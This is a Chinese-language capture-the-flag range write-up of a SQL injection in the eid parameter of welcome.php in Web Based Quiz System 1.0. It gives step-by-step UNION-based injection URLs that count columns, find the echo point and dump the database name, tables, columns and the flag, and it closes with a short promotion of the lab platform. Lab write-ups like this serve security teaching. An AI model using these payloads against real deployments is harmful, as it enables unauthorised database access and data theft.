一,靶场介绍
原文地址
在Web Based Quiz System 1.0中曾发现一漏洞,此漏洞被分类为致命。 受影响的是未知功能文件:welcome.php。 手动调试的软件参数:eid不合法输入可导致 SQL注入 (漏洞地址在下面写出)
二,影响版本
Web Based Quiz System 1.0
三,漏洞检测
3.1 复制路径在搜索引擎上进行访问,访问后页面
3.2 进行注册
3.3 登录后页面
3.4 点击序列3 start
3.5 测试sql注入漏洞
http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0%27&n=1&t=10
在eid后添加 ’ 用于测试sql漏洞 %27在url编码中是 ‘ 然后在%27后加–+
http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0%27%20--+&n=1&t=10
3.6 进行查字段数
http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0%27%20%20order%20by%201--+&n=1&t=10
http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0' order by 6--+&n=1&t=10
进行了报错 看来他的字段有5个
3.7 查询回显点
http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0%27%20and%201=2%20union%20select%201,2,3,4,5%20--+&n=1&t=10
回显点是3
3.8 查询数据库名
http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0%27%20and%201=2%20union%20select%201,2,database(),4,5%20--+&n=1&t=10
3.9 查询表名
http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0%27%20and%201=2%20union%20select%201,2,group_concat(table_name),4,5%20from%20information_schema.tables%20where%20table_schema=%27ctf%27--+&n=1&t=10
3.10 查询字段名
http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0%27%20and%201=2%20union%20select%201,2,group_concat(column_name),4,5%20from%20information_schema.columns%20where%20table_schema=%27ctf%27%20and%20table_name=%27flag%27%20--+&n=1&t=10
3.11查询字段数据
http://eci-2zegkoqp5gwrl79ki5gf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0%27%20and%201=2%20union%20select%201,2,flag,4,5%20from%20flag--+&n=1&t=10
成功获得flag然后提交flag即可
3.12靶场地址
https://yunjing.ichunqiu.com/ranking/summary?id=AzBXbl1oAmQ
注册送5沙硕 利用沙硕可挑战内网靶场 快来薅羊毛